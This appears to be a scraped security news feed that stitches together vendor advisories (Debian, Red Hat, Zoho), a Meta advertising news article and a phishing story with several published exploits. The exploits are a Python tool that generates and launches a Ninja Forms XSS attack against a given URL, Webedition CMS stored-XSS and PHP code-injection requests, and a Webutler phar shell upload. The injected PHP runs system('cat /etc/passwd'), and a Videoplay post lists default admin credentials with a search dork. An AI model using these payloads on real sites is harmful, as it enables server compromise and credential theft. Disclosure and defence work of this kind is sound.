Debian Linux Security Advisory 5465-1 - Seokchan Yoon discovered that missing sanitising in the email and URL validators of Django, a Python web development framework, could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5465-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 03, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : python-djangoCVE ID         : CVE-2023-36053Seokchan Yoon discovered that missing sanitising in the email and URLvalidators of Django, a Python web development framework, could resultin denial of service.For the oldstable distribution (bullseye), this problem has been fixedin version 2:2.2.28-1~deb11u2. This update also addresses CVE-2023-23969,CVE-2023-31047 and CVE-2023-24580.For the stable distribution (bookworm), this problem has been fixed inversion 3:3.2.19-1+deb12u1.We recommend that you upgrade your python-django packages.For the detailed security status of python-django please refer toits security tracker page at:https://security-tracker.debian.org/tracker/python-djangoFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTMEXoACgkQEMKTtsN8TjYgbA//QyvH70qUWpZtGBT19rQ8JQdcHCdh/FqlsosbYFwKwc+jZNfqyZWr45oMVKQvi8vggxPGXs9LfQb1LhWxsBzhNzCrvN24z7vSqWNensHVBA3NNaGkSDASsIXFZ/LvO0bMjdk0QQ5774CjhoixTBx5SmYy/oapTNeHrZv8geF+E5ga3+r2/lDLNZEfIFFMkfJRhoXuKS/cKKtfDnz37YDr0a8tAXDb/RbGvfu4igjDLWCMnq2aOmx2UaS2euvOlWknhv0r72Skp8ipLx5ykcEJ4WmD3LuNZbXZQNqbsYO9FX2yoXGJqwnuLvTHg/JCnYwrkUEDTcBAY8pbQ/MRM4yIYRxqEnQEyV8HIouajLgFKDtCJCG7Rii/axavcnBiNqgnp8Vg6/F0jKjJOEe4lnVl7xufAQcLTs2aUk9B2WlqKEpAF2xgPc1SdPXetdXy57N2R20Ft3jOS/s2V5YaButrGB0bKa7ktkpSez6Cr9FpNGSSP9G6sjoggRFcDSwHR9FIsX68cHE9DsCVE5J1PLAbJwqQiGl7s1ViDf1Ab4mMmdShPMOWB4mX57wxTcoAdxts6wgjotNwjEwOPEhYOSSAwxjGgeTvs3La4+nrjpFcq7Hg2Ot/FNBq0WsDst/oPfeZ/Lt/teUT36m5crWOovRMAAXKMSpg/KQ8L9b3HDrlwUE==ozYQ-----END PGP SIGNATURE-----

Debian Security Advisory 5465-1

WordPress Ninja Forms plugin version 3.6.25 suffers from a cross site scripting vulnerability.

# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt# Date: 2023-07-27# Exploit Author: Mehran Seifalinia# Vendor Homepage: https://ninjaforms.com/# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip# Version: 3.6.25# Tested on: Windows 10# CVE: CVE-2023-37979from requests import getfrom sys import argvfrom os import getcwdimport webbrowserfrom time import sleep# Values:url = argv[-1]if url[-1] == "/":    url = url.rstrip("/")# ConstantsCVE_NAME = "CVE-2023-37979"VULNERABLE_VERSION = "3.6.25"  # HTML templateHTML_TEMPLATE = f"""<!DOCTYPE html><html><head>  <title>{CVE_NAME}</title>  <style>    body {{      font-family: Arial, sans-serif;      background-color: #f7f7f7;      color: #333;      margin: 0;      padding: 0;    }}    header {{      background-color: #4CAF50;      padding: 10px;      text-align: center;      color: white;      font-size: 24px;    }}    .cool-button {{      background-color: #007bff;      color: white;      padding: 10px 20px;      border: none;      cursor: pointer;      font-size: 16px;      border-radius: 4px;    }}    .cool-button:hover {{      background-color: #0056b3;    }}  </style></head><body>  <header>  Ninja-forms reflected XSS ({CVE_NAME})</br>    Created by Mehran Seifalinia  </header>  <div style="padding: 20px;">    <form action="{url}/wp-admin/admin-ajax.php" method="POST">      <input type="hidden" name="action" value="nf_batch_process" />      <input type="hidden" name="batch_type" value="import_form_template" />      <input type="hidden" name="security" value="e29f2d8dca" />      <input type="hidden" name="extraData[template]" value="formtemplate-contactformd" />      <input type="hidden" name="method_override" value="_respond" />      <input type="hidden" name="data" value="Mehran"}}<img src=Seifalinia onerror=alert(String.fromCharCode(78,105,110,106,97,45,102,111,114,109,115,32,114,101,102,108,101,99,116,101,100,32,88,83,83,10,67,86,69,45,50,48,50,51,45,51,55,57,55,57,10,45,77,101,104,114,97,110,32,83,101,105,102,97,108,105,110,105,97,45))>" />      <input type="submit" class="cool-button" value="Click here to Execute XSS" />    </form>  </div>  <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>  <footer>  <a href="https://github.com/Mehran-Seifalinia">Github</a>  </br>  <a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a  </footer></body></html>"""def exploit():    with open(f"{CVE_NAME}.html", "w") as poc:        poc.write(HTML_TEMPLATE)        print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")        print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")        sleep(2)        webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")# Check if the vulnerable version is installeddef check_CVE():    try:        response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")        if response.status_code != 200 or not("Ninja Forms" in response.text):            print("[!] Ninja-forms plugin has not installed on this site.")            return False        else:            version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]            main_version = int(version.split(".")[0])            partial_version = int(version.split(".")[1])            final_version = int(version.split(".")[2])            if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):                print(f"[*] Vulnerable Nonja-forms version {version} detected!")                return True            else:                print(f"[!] Nonja-forms version {version} is not vulnerable!")                return False    except Exception as error:        print(f"[!] Error: {error}")        exit()# Check syntax of the scriptdef check_script():    usage = f"""Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]    OPTIONS:        --exploit:  Open a browser and execute the vulnerability.    TARGET:        An URL starts with 'http://' or 'https://'Examples:    > {argv[0].split("/")[-1]} https://vulnsite.com    > {argv[0].split("/")[-1]} --exploit https://vulnsite.com"""    try:        if len(argv) < 2 or len(argv) > 3:            print("[!] Syntax error...")            print(usage)            exit()        elif not url.startswith(tuple(["http://", "https://"])):            print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")            exit()        else:            for arg in argv:                if arg == argv[0]:                    print("[*]Starting the script >>>")                    state = check_CVE()                    if state == False:                        exit()                elif arg.lower() == "--exploit":                    exploit()                elif arg == url:                    continue                else:                    print(f"[!] What the heck is '{arg}' in the command?")    except Exception as error:        print(f"[!] Error: {error}")        exit()if __name__ == "__main__":    check_script()

WordPress Ninja Forms 3.6.25 Cross Site Scripting

Webedition CMS version 2.9.8.8 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Stored XSSApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Stored XssTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login to account2. Go to New ->  Media -> Image3. Upload malicious svg file svg file content:"""<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>"""Poc request:POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1Host: localhostContent-Length: 761Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8eAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Cross Site Scripting

An issue was discovered in Zoho ManageEngine Network Configuration Manager 12.6.165. The WebSocket endpoint allows Cross-site WebSocket hijacking.

**Abstract Advisory Information**

An endpoint of the application is prone to a Cross-site WebSocket hijacking attack.

Author: Dominique Righetto

**Version affected**

Name: Network Configuration Manager

Versions: 12.6.165

**Common Vulnerability Scoring System**

4.3

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

**Patch**

OpManager v12.7

Build No 127133 – August 2, 2023

**References**

*   https://www.manageengine.com/network-monitoring/help/read-me-complete.html#build\_127131

**Vulnerability Disclosure Timeline**

*   *   26/12/2022: Vulnerability discovery
    *   03/01/2023: Vulnerability Report to CERT-XLM
    *   06/01/2023: Vulnerability Report to Zoho through form
    *   06/01/2023: Vulnerability Report by Zoho ID ZVE-2023-0115.
    *   06/02/2023: POC Shared with Zoho
    *   09/02/2023: Changed Service from Network Configuration Manager to OpManager.
    *   21/02/2023: Zoho is working on it
    *   10/03/2023: Update asked to Zoho
    *   14/03/2023: Zoho needs more informations
    *   15/03/2023: POC sent to Zoho
    *   30/03/2023: Confirmation from Zoho that the bug is being fixed
    *   11/04/2023: CVE IDs assigned use CVE-2023-29505
    *   14/04/2023: Update asked to Zoho
    *   25/04/2023: Update asked to Zoho
    *   08/05/2023: Update asked to Zoho
    *   23/05/2023: Zoho updated their CVE ID
    *   24/05/2023: Update asked to Zoho
    *   13/06/2023: Update asked to Zoho
    *   13/06/2023: Zoho replied, fix is mid-July
    *   11/07/2023: Update asked to Zoho
    *   12/07/2023: Zoho gave a reward
    *   18/07/2023: Ask for fix number
    *   01/08/2023: Ask for update to Zoho
    *   02/08/2023: Patch number given from Zoho
    *   03/08/2023: Expected vulnerability disclosure

Our website uses cookies technologies to assist with navigation and your ability to provide feedback, analyze your use of our products and services, to enable you to use the social media functionalities and assist with our promotional and marketing efforts, and provide content from third parties. You may choose to opt-out from all non-essential cookies or allow them for a better browsing experience.  
For more information on the use of cookies, Please check our Privacy Notice ACCEPT REJECT SETTINGS

CVE-2023-29505: CVE-2023-29505 - Excellium Services

Webedition CMS version 2.9.8.8 suffers from a remote code execution vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)Application: webedition CmsVersion: v2.9.8.8   Bugs:  RCETechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login account2. Go to New -> Webedition page -> empty page3. Select php4. Set as "><?php echo system("cat /etc/passwd");?>  Description areaPoc request: POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1Host: localhostContent-Length: 1621Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0ddAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Remote Code Execution

Webutler version 3.2 suffers from a remote shell upload vulnerability.

    Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)Application: webutler CmsVersion: v3.2Bugs:  RCETechnology: PHPVendor URL: https://webutler.de/enSoftware Link: http://webutler.de/download/webutler_v3.2.zipDate of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit media 3.upload phar file4. upload poc.phar filepoc.phar file contents :<?php echo system("cat /etc/passwd");?>5. Visit to poc.phar filepoc request:POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1Host: localhostContent-Length: 40sec-ch-ua: sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36X_FILENAME: poc.pharsec-ch-ua-platform: ""Accept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webutler_v3.2/admin/browser/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropoluConnection: close<?php echo system("cat /etc/passwd");?>

Webutler 3.2 Shell Upload

Red Hat Security Advisory 2023-4461-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.14.0 ESR. Issues addressed include buffer overflow and bypass vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:4461-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4461  
Issue date:        2023-08-03  
CVE Names:         CVE-2023-4045 CVE-2023-4046 CVE-2023-4047   
                   CVE-2023-4048 CVE-2023-4049 CVE-2023-4050   
                   CVE-2023-4055 CVE-2023-4056 CVE-2023-4057   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.14.0 ESR.

Security Fix(es):

* Mozilla: Offscreen Canvas could have bypassed cross-origin restrictions  
(CVE-2023-4045)

* Mozilla: Incorrect value used during WASM compilation (CVE-2023-4046)

* Mozilla: Potential permissions request bypass via clickjacking  
(CVE-2023-4047)

* Mozilla: Crash in DOMParser due to out-of-memory conditions  
(CVE-2023-4048)

* Mozilla: Fix potential race conditions when releasing platform objects  
(CVE-2023-4049)

* Mozilla: Stack buffer overflow in StorageManager (CVE-2023-4050)

* Mozilla: Memory safety bugs fixed in Firefox 116, Firefox ESR 115.1,  
Firefox ESR 102.14, Thunderbird 115.1, and Thunderbird 102.14  
(CVE-2023-4056)

* Mozilla: Memory safety bugs fixed in Firefox 116, Firefox ESR 115.1, and  
Thunderbird 115.1 (CVE-2023-4057)

* Mozilla: Cookie jar overflow caused unexpected cookie jar state  
(CVE-2023-4055)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2228360 - CVE-2023-4045 Mozilla: Offscreen Canvas could have bypassed cross-origin restrictions  
2228361 - CVE-2023-4046 Mozilla: Incorrect value used during WASM compilation  
2228362 - CVE-2023-4047 Mozilla: Potential permissions request bypass via clickjacking  
2228363 - CVE-2023-4048 Mozilla: Crash in DOMParser due to out-of-memory conditions  
2228364 - CVE-2023-4049 Mozilla: Fix potential race conditions when releasing platform objects  
2228365 - CVE-2023-4050 Mozilla: Stack buffer overflow in StorageManager  
2228367 - CVE-2023-4055 Mozilla: Cookie jar overflow caused unexpected cookie jar state  
2228370 - CVE-2023-4056 Mozilla: Memory safety bugs fixed in Firefox 116, Firefox ESR 115.1, Firefox ESR 102.14, Thunderbird 115.1, and Thunderbird 102.14  
2228371 - CVE-2023-4057 Mozilla: Memory safety bugs fixed in Firefox 116, Firefox ESR 115.1, and Thunderbird 115.1

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
firefox-102.14.0-1.el7_9.src.rpm

x86_64:  
firefox-102.14.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.14.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
firefox-102.14.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.14.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
firefox-102.14.0-1.el7_9.src.rpm

ppc64:  
firefox-102.14.0-1.el7_9.ppc64.rpm  
firefox-debuginfo-102.14.0-1.el7_9.ppc64.rpm

ppc64le:  
firefox-102.14.0-1.el7_9.ppc64le.rpm  
firefox-debuginfo-102.14.0-1.el7_9.ppc64le.rpm

s390x:  
firefox-102.14.0-1.el7_9.s390x.rpm  
firefox-debuginfo-102.14.0-1.el7_9.s390x.rpm

x86_64:  
firefox-102.14.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.14.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:  
firefox-102.14.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.14.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
firefox-102.14.0-1.el7_9.src.rpm

x86_64:  
firefox-102.14.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.14.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
firefox-102.14.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.14.0-1.el7_9.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4045  
https://access.redhat.com/security/cve/CVE-2023-4046  
https://access.redhat.com/security/cve/CVE-2023-4047  
https://access.redhat.com/security/cve/CVE-2023-4048  
https://access.redhat.com/security/cve/CVE-2023-4049  
https://access.redhat.com/security/cve/CVE-2023-4050  
https://access.redhat.com/security/cve/CVE-2023-4055  
https://access.redhat.com/security/cve/CVE-2023-4056  
https://access.redhat.com/security/cve/CVE-2023-4057  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJky7jbAAoJENzjgjWX9erE4zMP/jUlmgl45eVrvZOBC1GXXCpm  
V//5y888EHGgC2CmniNdjmRZIMbHCo5xkvFiKB99spN0SsJMYDpTGhdb55dSKUmd  
QS4NXsWjfwb7VDrj5o7xOxDOY7NKXdq9xuVWBtn3NYr+9RQjUB77TCfvowgxbPNn  
NF4EAZv6gEBRvl2plx2jDdN452MDNDNS5dhl2gcbz/vcMLabIo9ePjDFzH5k9UA5  
7jYKkWiJpcsBQoc3bv3mQUHpskOsgSqCWJVB/MIP4s4UARsn+tVBkRbeUdKmueEY  
0/gI/O698ruhrlsCOZVPXxCIaFliP/PnoYoCwvVKrfDpOHb19uXTgXrp9xHxLmpB  
GVYuOAA+iSlJwBKdV2IzDO85cfB02I0HCtTgUBJTfzvCk+DY0yQ09R5Nu6iPJ+aa  
lKg9AoPHqeydBX8EvN7AdC5BkbuJJcW2PdkUcw7K6q+kDf7cegilHR+uz217Kyq3  
Ew8bfzNe9uxMVBjQ+G2zJUhXBYOzmjiADvhlR6SsWIm0RE54TCbqvMHXVpaEsdPa  
GUyIZYwGn/aZKcLFgpdLGTKHt2AqH8weeyz0UVIhSWYjrFXGyTskrMHNExcqPdjA  
XlKpSoA0FBzChRqU7TzKudwt0R7tWFrS2jNxneuoe0Rp3GZ4EVIcgLxybqgpNgQV  
8H2EBbRX1f3TMSgdrUta  
=JTSB  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4461-01

Videoplay version 1.3.0 appears to leave default credentials installed after installation.

    ======================================================================================================================================| # Title     : Videoplay V1.3.0 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                               || # Vendor    : https://codecanyon.net/                                                                                              |  | # Dork      : VideoPlay - The best video subscription platform                                                                     |======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Use Admin : admin@coffeetheme.com & Pass : password[+] https://videoswebguyzdashboardcom/dashboard/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Videoplay 1.3.0 Insecure Settings

Categories: Personal
Tags: meta

Tags:  Facebook

Tags:  EU

Tags:  legal

Tags:  litigation

Tags:  behavioural

Tags:  advertising

Tags:  tracking

We take a look at what appears to be the beginning of the end for Meta's behavioural advertising in Europe.



(Read more...)




The post The end looms for Meta's behavioural advertising in Europe appeared first on Malwarebytes Labs.

The EU is going toe to toe with Meta once more, with the social network giant conceding defeat yet again. After having taken Meta to task for various privacy violations and data breaches, Meta is now having to provide European users with a way to opt out of behavioural advertising. The threat of fines totalling $100,000 a day probably helped things along a little bit.

This has been a long time coming. In fact, it’s taken no fewer than five years of “extensive litigation” to reach this landmark moment. Two complaints from the European Center for Digital Right (NYOB) back in 2018 set the wheels in motion. Additional interest from the European Data Protection Board and decisions made by the Court of Justice of the European Union (CJEU) heaped additional pressure on the now relenting Meta.

From Meta’s most recent post on this subject:

> Today, we are announcing our intention to change the legal basis that we use to process certain data for behavioural advertising for people in the EU, EEA and Switzerland from ‘Legitimate Interests’ to ‘Consent’. This change is to address a number of evolving and emerging regulatory requirements in the region, notably how our lead data protection regulator in the EU, the Irish Data Protection Commission (DPC), is now interpreting GDPR in light of recent legal rulings, as well as anticipating the entry into force of the Digital Markets Act (DMA). 

As The Record explains, behavioural advertising typically involves the display of adverts customised by someone’s browsing habits and / or app usage. A picture is built up over time of said user, and it essentially follows them around the web. Web browsers have been pushing back against some of this behaviour for some time now, with some of them isolating third party cookies or looking to sunset them completely.

In this case, Meta may be looking to get ahead of the game somewhat in the face of what The Record calls “an inevitable near-term regulatory reality”, and so look proactive while getting its own preferred time frame for changes in order.

There’s no solid dates set yet for when these changes may come into force. October has been referenced as a possibility, but (as with the delays to cookie sunsetting) there may well be similar delays here. From the Meta blog:

> We will share further information over the months ahead, because it will take time for us to continue to constructively engage with regulators to ensure that any proposed solution addresses regulatory obligations in the EU, including GDPR and the upcoming DMA.

Whenever these changes come into force, many meta users will not see the benefit. If you’re located outside of the EU, the European Economic Area (EEA), or Switzerland, then unfortunately you’re out of luck on the behavioural advertising avoidance front.

This may well create additional pressure regardless, given the many privacy and safety organisations located in the US who will no doubt be watching these developments closely to see what can be replicated.

Meta has had a very rough time of things where the EU is concerned. Back in July 2022, regulators were threatening to ban Facebook in relation to data transfers to the US. In September of the same year, Instagram was counting the cost of a $400m fine related to the handling of children’s data. November? That would be the $277m fine issued by the Irish Data Protection Commision because of a Facebook data breach. March was all about Facebook having “illegally processed" user data. July of this year saw Meta subsidiaries ordered to pay $14m over misleading data collection disclosure.

Wherever you look, no matter which part of the business we’re talking about, there’s often a fine and an EU regulator thrown into the mix. It’s a very large and costly legal war of attrition, and the message is loud and clear. The EU will keep doing this for as long as it takes for Meta to get its house in order.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

The end looms for Meta's behavioural advertising in Europe

One frustrating aspect of email phishing is the frequency with which scammers fall back on tried-and-true methods that really have no business working these days. Like attaching a phishing email to a traditional, clean email message, or leveraging link redirects on LinkedIn, or abusing an encoding method that makes it easy to disguise booby-trapped Microsoft Windows files as relatively harmless documents.

One frustrating aspect of email phishing is the frequency with which scammers fall back on tried-and-true methods that really have no business working these days. Like attaching a phishing email to a traditional, clean email message, or leveraging link redirects on **LinkedIn**, or abusing an encoding method that makes it easy to disguise booby-trapped **Microsoft Windows** files as relatively harmless documents.

KrebsOnSecurity recently heard from a reader who was puzzled over an email he’d just received saying he needed to review and complete a supplied W-9 tax form. The missive was made to appear as if it were part of a mailbox delivery report from **Microsoft 365** about messages that had failed to deliver.

The reader, who asked to remain anonymous, said the phishing message contained an attachment that appeared to have a file extension of “.pdf,” but something about it seemed off. For example, when he downloaded and tried to rename the file, the right arrow key on the keyboard moved his cursor to the left, and vice versa.

The file included in this phishing scam uses what’s known as a “right-to-left override” or RLO character. RLO is a special character within unicode — an encoding system that allows computers to exchange information regardless of the language used — that supports languages written from right to left, such as Arabic and Hebrew.

